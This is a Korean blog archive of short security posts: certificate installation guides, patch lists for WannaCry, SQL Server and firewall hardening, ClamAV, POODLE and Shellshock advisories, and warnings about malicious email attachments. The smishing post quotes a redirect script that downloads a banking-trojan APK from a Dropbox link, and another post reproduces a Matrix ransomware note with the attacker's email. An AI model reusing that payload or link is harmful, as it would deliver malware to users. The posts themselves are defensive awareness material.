Category Archives: [DEV]보안

Symantec Endpoint Protection(SEP)

하나 이상의 Symantec Endpoint Protection(SEP) 클라이언트 기능에 의한 검사에서 파일, 폴더, 파일 확장자 또는 응용 프로그램이 제외되도록 할 수 있습니다. 이는 Symantec Endpoint Protection Manager(SEPM) 콘솔의 중앙 집중식 예외 정책을 사용하여 관리되는 SEP 클라이언트에 대해 구성될 수 있습니다. https://support.symantec.com/ko_KR/article.TECH183201.html

Let’s Encrypt Windows (win7, win2012) SSL 설치

win7 에서도 netframework 4.6.01 이상이면 잘 설치 됩니다. 1.다운로드 https://github.com/PKISharp/win-acme/releases 2.압축풀기 3.0 netframework4.6.01 이상 필요 참조 : https://auctionpro.co.kr/?p=5648 3.도스에서 실행 4. IIS 에서 확인 5. 사이트에서 확인 참조 : https://weblog.west-wind.com/posts/2016/Feb/22/Using-Lets-Encrypt-with-IIS-on-Windows#windows-and-iis–not-a-first-class-citizen

ubuntu 18.04 LTS 에 Let’s Encrypt SSL 설치하기

Ubuntu 18.04 에서 Let’s Encrypt SSL Cert 설치 방법이 달라졌다. 1. Install Let’s Encrypt client (Certbot)

2. Get an SSL Certificate

결과

3. Test SSL https://www.ssllabs.com/ssltest/analyze.html?d=aaa.auctionpro.co.kr 4. Auto Renewal

결과

참조 : https://devanswers.co/lets-encrypt-ssl-apache-ubuntu-18-04/ Err _체크중

다음 에러시

XMRing CPU miner

As there is no outward indication that the program is running, here is a list of symptoms that a user can use to determine if they are infected with the VMProtect Miner: You will see a process with a description of XMRig CPU Miner, or other description with XMRig in it, running in task manager… Read More »

An Army of Thousands of Hacked Servers Found Mining Cryptocurrencies

소스: An Army of Thousands of Hacked Servers Found Mining Cryptocurrencies 해킹 된 서버 수천 군대가 광업 크립토 통화를 발견했습니다.  목요일, 2017 년 5 월 4 일 Swati Khandelwal  bondnet-windows-hacking-tool 15,000 개 이상의 손상된 서버로 구성된 새로운 봇넷은 다양한 크립토 (cryptocur) 통화에 사용되어 매달 $ 25,000 정도의 수익을 창출했습니다. cryptocurrencies는 엄청난 양의 컴퓨팅 능력을 필요로하기… Read More »

mail header 분석

Version Name Version Number Outlook 97 8.0 Outlook 98 8.5 Outlook 2000 9.0 Outlook XP/2002 10.0 Outlook 2003 11.0 Outlook 2007 12.0 Outlook 2010 14.0 Outlook 2013 15.0 Outlook 2016 16.0 링크 : https://toolbox.googleapps.com/apps/messageheader/  

랜섬웨어(Ransomware) Matrix

#How_to_return_files# Wаrning! Аll yоur filеs wеrе еnсryрtеd with RSА-2048 аlgоrithm. Withоut уоur pеrsоnаl dесrуptiоn kеy dаtа rеcоvеrу is impоssiblе! Tо gеt yоur uniquе kеy аnd dесrурt thе filеs, Yоu hаvе to sеnd thе fоllоwing cоdе: 45677B48199283FD tо оur е-mаil аddrеss: decodedecode@tutanota.com Yоu will rеciеvе аll nеcеssаry instruсtiоns. Yоu hаvе оnlу 96 hоurs tо rеcоvеr yоur… Read More »

wannacryptor ransomware pache download 윈도우 모든버젼 보안팩

Windows XP SP2(64비트 시스템용) http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa Windows XP SP3 (32비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55245 Windows XP Embedded SP3(32비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55247 Windows 8(32비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55246 Windows 8(64비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55249 Windows 8.1(32비트 시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012213 Windows 8.1(64비트 시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012213 WindowsVista서비스팩\2 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012598 WindowsVista(64비트시스템용)서비스팩2 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012598 Windows7(32비트시스템용)서비스팩1 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012212 Windows7(64비트시스템용)서비스팩1 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012212 Windows10(32비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012606 Windows10(64비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012606 Windows10버전1511(32비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013198 Windows10버전1511(64비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013198 Windows10버전1607(32비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013429 Windows10버전1607(64비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013429 Windows Server… Read More »

SQL Server 기본포트(1433)와 sa계정의 위험성

▷ Sql 서버가 감지되면 sa 계정으로 비밀번호를 조합하여 될때까지 무차별 대입공격 접속을 시도한다. ▷ 반드시 접속포트를 바꾸고 웹인경우 로컬만 접속이 가능하도록한다. ▷ sa 계정은 중지시켜 접속할수 없도록 한다. ▶ 이벤트 로그에서 중국IP의 접속사항을 파악 할 수 있다. ▶ 아이피를 추적해보면 중국IP란것을 알수 있다. ▶  예제는 express버전  : 1433 포트 바꾸기 // 다른 포트로 설정 후 sql 재실행… Read More »

winserver 2012 ping 막기(IP제한)

▶ 개인, 공용 프로필 방화벽을 활성화 되어 있는지 확인한다. /안되어 있으면 활성화 시킨다. ▶  파일 및 프린터 공유(에코 요청- ICMPv4-In) 규칙 사용안함으로 하면 완전히 Ping을 막을 수 있다 . ▶IP영역을 지정해서 특정아이피으로만 Ping 확인 할 수 있게 할 수 있다. ▶ cmd 에서 특정 IP으로만 ping 되는지 확인한다.

FOLIODETE.scr trojan

이메일에 첨부되는 FOLIODETE.scr Trojan 첨부된 악선코드 파일 :  함부로 클릭하지 마세요.  

1404UK_TPL_screen.zip 이메일 첨부파일

이메일제목 :Discount Structure 2015 내용: Please find attached a PDF copy of the 2015 price list and discount structure 1404UK_TPL_screen.zip 첨부파일 다운로드후 압축 풀면 1404UK_TPL_screen.exe 악성코드

[linux] 백신 ClamAV

참조 : http://www.clamav.net/doc/install.html#Debian 참조 : https://auctionpro.co.kr/?p=2511 ubuntu 인스톨 sudo apt-get install clamav 검사 sudo clamscan -r /.   문서다운로드  : clamdoc

SSL 3 is dead, killed by the POODLE attack // 보인인증서 SSL3가 해킹당했다는 내용

해결됨 OpenSSL에서 발생한 메모리 고갈 취약점, 푸들(Poodle, Padding Oracle On Downloaded Legacy Encryption) 취약점 등 총 4개의 취약점을 보완한 보안업데이트를 발표 CVE-2014-3513 : DTLS SRTP 핸드쉐이크 메시지를 처리하는 중 발생하는 메모리 고갈 CVE-2014-3567 : SSL/TLS/DTLS 서버에서 session ticket 값을 받을 때 발생하는 메모리 CVE-2014-3566 : SL3.0에서 다운 그레이드를 통해 MITM(man-in-the-middle)공격을 가능하게 하는 Poodle(Padding Oracle On… Read More »

9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)

최근 9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)에 대하여 안내 드립니다. – 이름 : Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169) – 취약점 정보 : GNU bash 4.3 및 이전 버전 GNU bash 취약점을 이용하여 여러가지 공격 유형이 탐지되고 있음 ex) 백도어 생성, 악성코드 다운로드, 패스워드 파일 탈취, 웹쉘 생성, 파일 삭제, 시스템 강제… Read More »

스마트폰 피싱 문자=> KB 은행 앱 해킹용

[법원] 민사소송 출석명령서입니다. 라고 문자 날라와서. 크롬으로 사이트 들어가 보니 <script>location.replace(‘https://www.dropbox.com/s/ev44e5vwd8joyac/16yk.apk?dl=1’);</script> 16yk.apk 파일 다운로드 되네요. 아이폰에는 안갈리겠고  안드로이드용 입니다. 털림 1.특정 SMS 계정 털림 (국내) 2. url.kr 사이트 ftp 털림 (국내) 3. dropbox.com ftp 털림 (해외 :미국) 소스 확인해보니 k b _ c a r d _ l a y o u t  택스트 보이는 거… Read More »